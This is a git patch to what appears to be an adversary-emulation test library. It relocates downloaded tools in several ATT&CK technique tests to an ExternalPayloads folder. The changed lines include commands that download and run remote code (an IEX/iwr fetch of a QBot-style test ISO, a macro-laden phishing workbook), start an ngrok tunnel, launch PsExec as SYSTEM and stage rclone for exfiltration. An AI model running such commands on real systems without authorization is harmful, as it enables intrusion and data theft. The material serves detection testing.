From 825d8a23e400e5eddee63491f2bdb467c269fcd9 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 13 Dec 2025 20:42:28 -0500 Subject: [PATCH] external payloads standardization --- atomics/T1048.003/T1048.003.yaml | 7 ++++--- atomics/T1057/T1057.yaml | 16 ++++++++-------- atomics/T1059.004/T1059.004.yaml | 4 ++-- atomics/T1204.003/T1204.003.yaml | 9 +++++---- atomics/T1219/T1219.yaml | 6 +++--- atomics/T1222.001/T1222.001.yaml | 6 +++--- atomics/T1552/T1552.yaml | 3 ++- atomics/T1562.008/T1562.008.yaml | 9 ++++++--- atomics/T1566.001/T1566.001.yaml | 5 +++-- atomics/T1569.002/T1569.002.yaml | 13 ++++++------- atomics/T1572/T1572.yaml | 14 +++++++------- atomics/T1580/T1580.yaml | 3 ++- 12 files changed, 51 insertions(+), 44 deletions(-) diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index 83e53f15..f65367f0 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -193,10 +193,11 @@ atomic_tests: fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760 - description: 'Check if rclone zip exists' prereq_command: | - if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip" - Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\ + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\ executor: command: |- $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index ed534072..5af4b0fb 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -103,10 +103,10 @@ atomic_tests: if (Test-Path "c:\Program Files\Process Hacker 2\#{processhacker_exe}") {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading Process Hacker - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "C:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" Write-Host Installing Process Hacker - Start-Process "c:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s" executor: command: Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}" name: powershell @@ -125,15 +125,15 @@ atomic_tests: dependencies: - description: PCHunter must be present in device prereq_command: | - if (Get-ChildItem -Path C:\ -Include *PCHunter64* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}) {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading PC Hunter - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "C:\Temp\ExternalPayloads\PCHunter_free.zip" - Expand-Archive -LiteralPath 'C:\Temp\ExternalPayloads\PCHunter_free.zip' -DestinationPath C:\Temp\ExternalPayloads + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip" + Expand-Archive -LiteralPath 'PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip' -DestinationPath PathToAtomicsFolder\..\ExternalPayloads Write-Host Unzipping Installing Process Hunter executor: - command: Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}" + command: Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}" name: powershell elevation_required: true - name: Launch Taskmgr from cmd to View running processes diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index eb9c0877..ec342027 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -52,7 +52,7 @@ atomic_tests: autosuid: description: Path to the autosuid shell script type: path - default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh + default: PathToAtomicsFolder/../ExternalPayloads/AutoSUID.sh autosuid_url: description: Path to download autosuid shell script type: url @@ -82,7 +82,7 @@ atomic_tests: linenum: description: Path to the LinEnum shell script type: path - default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh + default: PathToAtomicsFolder/../ExternalPayloads/LinEnum.sh linenum_url: description: Path to download LinEnum shell script type: url diff --git a/atomics/T1204.003/T1204.003.yaml b/atomics/T1204.003/T1204.003.yaml index abff148b..315cd645 100644 --- a/atomics/T1204.003/T1204.003.yaml +++ b/atomics/T1204.003/T1204.003.yaml @@ -8,15 +8,16 @@ atomic_tests: - windows executor: command: |- - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso") - Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" - $mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso") + Mount-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" + $mountedpath = (Get-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" | Get-Volume).DriveLetter $finalpath = $mountedpath + ":\" cd $finalpath .\calc.exe.lnk cleanup_command: |- start-sleep -s 5 stop-process -Name "Calculatorapp" -Force - dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso" + dismount-diskimage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" name: powershell elevation_required: true \ No newline at end of file diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 6c6254a3..f35c02da 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -333,10 +333,10 @@ atomic_tests: if (Test-Path "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}") {exit 0} else {exit 1} get_prereq_command: |- Write-Host Downloading Splashtop Streamer - New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "C:\Temp\ExternalPayloads\Splashtop.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe" Write-Host Installing Splashtop Streamer - Start-Process "c:\Temp\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s" + Start-Process "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s" executor: command: |- Start-Process -FilePath "C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}" diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 29c072d3..f5b1f57e 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -158,9 +158,9 @@ atomic_tests: prereq_command: | if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1} get_prereq_command: |- - New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null - Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi - msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest #{SubInAclDownloadPath} -OutFile PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi + msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi" /qn executor: command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"' name: command_prompt diff --git a/atomics/T1552/T1552.yaml b/atomics/T1552/T1552.yaml index 9f31019d..edd54fd8 100644 --- a/atomics/T1552/T1552.yaml +++ b/atomics/T1552/T1552.yaml @@ -13,7 +13,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1552/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string @@ -25,6 +25,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index ada5f977..da342b59 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -173,7 +173,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string @@ -185,6 +185,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ @@ -228,7 +229,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string @@ -240,6 +241,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ @@ -282,7 +284,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string @@ -294,6 +296,7 @@ atomic_tests: prereq_command: | if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi; get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" == "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 8315c31e..36f729ac 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -12,10 +12,11 @@ atomic_tests: command: | $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null + Invoke-WebRequest -Uri $url -OutFile PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm name: powershell cleanup_command: | - Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm -ErrorAction Ignore - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index 11873de7..442e4adc 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -216,16 +216,15 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - PsExec tool from Sysinternals must exist in the '\Users\Public\Temp\' directory + PsExec tool from Sysinternals must exist in the ExternalPayloads directory prereq_command: | - if (Get-ChildItem -Path C:\ -Include *psexec* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Type Directory "C:\Users\Public\Temp\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\Users\Public\Temp\PSTools.zip" - Expand-Archive "C:\Users\Public\Temp\PsTools.zip" "C:\Users\Public\Temp\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" + Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\" -Force executor: command: |- - cd C:\Users\Public\Temp\ - .\PsExec.exe -i -s cmd -accepteula + PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe -i -s cmd -accepteula name: powershell elevation_required: true diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml index f9dd1e22..ddaf58fe 100644 --- a/atomics/T1572/T1572.yaml +++ b/atomics/T1572/T1572.yaml @@ -131,19 +131,19 @@ atomic_tests: - description: | Download ngrok prereq_command: | - if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\ngrok) {exit 0} else {exit 1} get_prereq_command: | - New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null - Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip - Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok + New-Item -Path PathToAtomicsFolder\..\ExternalPayloads\ngrok -ItemType Directory -Force | Out-Null + Invoke-WebRequest #{download} -OutFile PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\ngrok executor: command: | - C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null - Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null + PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null + Start-Job -ScriptBlock { PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe tcp #{port_num} } | Out-Null Start-Sleep -s 5 Stop-Job -Name Job1 | Out-Null cleanup_command: | - Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ngrok -Recurse -ErrorAction Ignore Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore name: powershell elevation_required: true diff --git a/atomics/T1580/T1580.yaml b/atomics/T1580/T1580.yaml index 73235aba..00926e19 100644 --- a/atomics/T1580/T1580.yaml +++ b/atomics/T1580/T1580.yaml @@ -13,7 +13,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1580/src + default: $PathToAtomicsFolder/../ExternalPayloads aws_region: description: AWS region to detonate type: string @@ -25,6 +25,7 @@ atomic_tests: prereq_command: | if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi get_prereq_command: | + mkdir -p #{stratus_path} if [ "$(uname)" = "Darwin" ] then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/